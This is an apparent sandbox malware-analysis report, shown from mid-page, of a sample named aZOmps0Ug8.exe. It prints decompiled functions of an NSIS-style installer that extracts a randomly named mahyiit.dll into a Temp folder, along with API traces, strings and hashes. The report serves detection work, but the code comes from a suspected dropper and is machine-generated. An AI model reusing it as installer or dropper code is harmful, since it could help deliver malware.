                        • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\engineer\\Desktop\\aZOmps0Ug8.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\aZOmps0Ug8.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\engineer\\Desktop";
				E00405B98("C:\\Users\\engineer\\Desktop", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x423f54 - _t82; // 0x8200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423f54; // 0x8200
						E004030B3(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
								__eflags =  *0x423f5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					_t65 = E00403081( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423f54; // 0x8200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f54;
						if( *0x423f54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b0d8; // 0x8200
						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423f54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f0e8;
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                        0x00402c5d
                        0x00402c60
                        0x00402c63
                        0x00402c66
                        0x00402c6c
                        0x00402c7d
                        0x00402c82
                        0x00402c95
                        0x00402c9a
                        0x00402c9d
                        0x00402ca3
                        0x00000000
                        0x00402ca5
                        0x00402cb0
                        0x00402cb6
                        0x00402cc7
                        0x00402cce
                        0x00402cd4
                        0x00402cd6
                        0x00402cdb
                        0x00402cdd
                        0x00402dca
                        0x00402dcc
                        0x00402dd1
                        0x00402dd8
                        0x00000000
                        0x00000000
                        0x00402dda
                        0x00402ddd
                        0x00402e01
                        0x00402e06
                        0x00402e0c
                        0x00402e0e
                        0x00402e17
                        0x00402e1c
                        0x00402e1f
                        0x00402e20
                        0x00402e21
                        0x00402e23
                        0x00402e28
                        0x00402e2b
                        0x00402e3e
                        0x00402e42
                        0x00402e4a
                        0x00402e4f
                        0x00402e51
                        0x00402e51
                        0x00402e51
                        0x00402e59
                        0x00402e59
                        0x00402e5c
                        0x00402e5d
                        0x00402e5d
                        0x00402e60
                        0x00402e62
                        0x00402e62
                        0x00402e62
                        0x00402e6c
                        0x00402e72
                        0x00402e80
                        0x00402e85
                        0x00000000
                        0x00402e85
                        0x00000000
                        0x00402e2b
                        0x00402de5
                        0x00402df0
                        0x00402df5
                        0x00402df7
                        0x00000000
                        0x00000000
                        0x00402dfc
                        0x00402dff
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402ce3
                        0x00402ce8
                        0x00402ce8
                        0x00402ced
                        0x00402cf1
                        0x00402cf8
                        0x00402cfd
                        0x00402cff
                        0x00402d01
                        0x00402d01
                        0x00402d05
                        0x00402d0a
                        0x00402d0c
                        0x00402e36
                        0x00402e2d
                        0x00000000
                        0x00402e2d
                        0x00402d12
                        0x00402d19
                        0x00402d95
                        0x00402d99
                        0x00402d9d
                        0x00402da2
                        0x00000000
                        0x00402d99
                        0x00402d22
                        0x00402d27
                        0x00402d2a
                        0x00402d2f
                        0x00000000
                        0x00000000
                        0x00402d31
                        0x00402d38
                        0x00000000
                        0x00000000
                        0x00402d3a
                        0x00402d41
                        0x00000000
                        0x00000000
                        0x00402d43
                        0x00402d4a
                        0x00000000
                        0x00000000
                        0x00402d4c
                        0x00402d53
                        0x00000000
                        0x00000000
                        0x00402d55
                        0x00402d5b
                        0x00402d64
                        0x00402d6a
                        0x00402d6d
                        0x00402d6f
                        0x00402d75
                        0x00000000
                        0x00000000
                        0x00402d7b
                        0x00402d7f
                        0x00402d87
                        0x00402d87
                        0x00402d8a
                        0x00402d8d
                        0x00402d8f
                        0x00402d91
                        0x00402d91
                        0x00000000
                        0x00402d8f
                        0x00402d81
                        0x00402d85
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402da3
                        0x00402da3
                        0x00402da9
                        0x00402db5
                        0x00402db5
                        0x00402db8
                        0x00402dbe
                        0x00402dc0
                        0x00402dc0
                        0x00402dc8
                        0x00402dc8
                        0x00000000
                        0x00402dc8

                        APIs
                        • GetTickCount.KERNEL32 ref: 00402C66
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\aZOmps0Ug8.exe,00000400), ref: 00402C82
                          • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\aZOmps0Ug8.exe,80000000,00000003), ref: 00405873
                          • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                        • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\aZOmps0Ug8.exe,C:\Users\user\Desktop\aZOmps0Ug8.exe,80000000,00000003), ref: 00402CCE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                        • String ID: "C:\Users\user\Desktop\aZOmps0Ug8.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\aZOmps0Ug8.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                        • API String ID: 4283519449-346853604
                        • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                        • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                        • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                        • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\engineer\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\engineer\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                        0x00401751
                        0x00401758
                        0x00401761
                        0x00401764
                        0x00401767
                        0x0040176c
                        0x00401774
                        0x00401790
                        0x00401776
                        0x00401776
                        0x00401777
                        0x00401777
                        0x00401796
                        0x004017a0
                        0x004017a0
                        0x004017a4
                        0x004017a7
                        0x004017ac
                        0x004017ae
                        0x004017b0
                        0x004017b5
                        0x004017b5
                        0x004017c0
                        0x004017c0
                        0x004017d1
                        0x004017d3
                        0x004017d3
                        0x004017d4
                        0x004017d4
                        0x004017d7
                        0x004017da
                        0x004017dd
                        0x004017dd
                        0x004017e4
                        0x004017f3
                        0x004017f8
                        0x004017fb
                        0x004017fe
                        0x00000000
                        0x00000000
                        0x00401800
                        0x00401803
                        0x0040185d
                        0x00401862
                        0x004015a8
                        0x0040268f
                        0x0040268f
                        0x004028be
                        0x004028c1
                        0x004028c1
                        0x00000000
                        0x00401805
                        0x0040180b
                        0x00401816
                        0x00401823
                        0x0040182e
                        0x00401844
                        0x00401844
                        0x00401847
                        0x00000000
                        0x0040184d
                        0x0040184d
                        0x0040184e
                        0x0040186b
                        0x004028c7
                        0x004028c7
                        0x004028c7
                        0x00401850
                        0x00401850
                        0x00401851
                        0x00401492
                        0x00402241
                        0x00402241
                        0x00402241
                        0x0040184e
                        0x00401847
                        0x004028c9
                        0x004028cd
                        0x004028cd
                        0x0040187b
                        0x00401880
                        0x00401886
                        0x00401887
                        0x00401888
                        0x0040188b
                        0x0040188e
                        0x00401893
                        0x00401899
                        0x0040189d
                        0x0040189f
                        0x004018a7
                        0x004018b3
                        0x004018a1
                        0x004018a1
                        0x004018a5
                        0x00000000
                        0x00000000
                        0x004018a5
                        0x004018bc
                        0x004018c2
                        0x004018c4
                        0x00000000
                        0x004018ca
                        0x004018ca
                        0x004018cd
                        0x004018e5
                        0x004018cf
                        0x004018d2
                        0x004018db
                        0x004018db
                        0x004018ea
                        0x004018ef
                        0x0040223c
                        0x00000000
                        0x0040223c
                        0x00000000

                        APIs
                        • lstrcatA.KERNEL32(00000000,00000000,kzopaqjcb,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                        • CompareFileTime.KERNEL32(-00000014,?,kzopaqjcb,kzopaqjcb,00000000,00000000,kzopaqjcb,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                          • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,ncjucqtyih Setup,NSIS Error), ref: 00405BA5
                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                          • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                          • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj1540.tmp$C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll$kzopaqjcb
                        • API String ID: 1941528284-3564675792
                        • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                        • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                        • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                        • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423f98; // 0x9709
					E004030B3(_t91 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}
























                        0x00402e96
                        0x00402e9a
                        0x00402e9d
                        0x00402ea2
                        0x00402ea4
                        0x00402ea4
                        0x00402eab
                        0x00402eaf
                        0x00402eb3
                        0x00402eb5
                        0x00402eb5
                        0x00402eba
                        0x00402ebf
                        0x00402ec1
                        0x00402eca
                        0x00402eca
                        0x00402ed5
                        0x00402edc
                        0x0040302c
                        0x0040302c
                        0x00000000
                        0x00402ee2
                        0x00402ee6
                        0x00403017
                        0x0040306c
                        0x00403031
                        0x00403037
                        0x00403039
                        0x00403039
                        0x0040304a
                        0x00000000
                        0x0040304c
                        0x0040305f
                        0x00403011
                        0x00403011
                        0x0040302e
                        0x0040302e
                        0x00000000
                        0x00403066
                        0x00403066
                        0x00403069
                        0x00000000
                        0x00403069
                        0x0040305f
                        0x0040304a
                        0x00403077
                        0x00000000
                        0x00403077
                        0x0040301c
                        0x0040301e
                        0x0040301e
                        0x0040302a
                        0x00403074
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040302a
                        0x00402ef7
                        0x00402efa
                        0x00402eff
                        0x00402eff
                        0x00402f09
                        0x00402f0c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402f12
                        0x00402f12
                        0x00402f12
                        0x00402f1a
                        0x00402f1c
                        0x00402f1c
                        0x00402f2d
                        0x00000000
                        0x00000000
                        0x00402f33
                        0x00402f36
                        0x00402f3c
                        0x00402f42
                        0x00402f4a
                        0x00402f50
                        0x00402f55
                        0x00402f5c
                        0x00402f5f
                        0x00000000
                        0x00000000
                        0x00402f65
                        0x00402f6b
                        0x00402f6d
                        0x00402f7a
                        0x00402f7c
                        0x00402faa
                        0x00402fb0
                        0x00402fb9
                        0x00402fbe
                        0x00402fbe
                        0x00402fc5
                        0x00403005
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402fc7
                        0x00402fca
                        0x00402fea
                        0x00402fed
                        0x00402ff0
                        0x00402ff6
                        0x00402ffa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403000
                        0x00402fd6
                        0x00402fde
                        0x00000000
                        0x00402fe5
                        0x00402fe5
                        0x00000000
                        0x00402fe5
                        0x00402fde
                        0x00402fc5
                        0x0040300d
                        0x00000000
                        0x0040300d
                        0x00000000
                        0x00402f12

                        APIs
                        • GetTickCount.KERNEL32 ref: 00402EEC
                        • GetTickCount.KERNEL32 ref: 00402F6D
                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                        • wsprintfA.USER32 ref: 00402FAA
                        • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CountTick$FileWritewsprintf
                        • String ID: ... %d%%
                        • API String ID: 4209647438-2449383134
                        • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                        • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                        • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                        • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                        0x00405351
                        0x00405355
                        0x00405358
                        0x0040535e
                        0x00405362
                        0x00405366
                        0x0040536e
                        0x00405375
                        0x0040537b
                        0x00405382
                        0x00405389
                        0x00405391
                        0x00405393
                        0x00000000
                        0x00405393
                        0x0040539d
                        0x004053a4
                        0x004053ba
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004053bc
                        0x004053c0

                        APIs
                        • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                        • GetLastError.KERNEL32 ref: 0040539D
                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                        • GetLastError.KERNEL32 ref: 004053BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
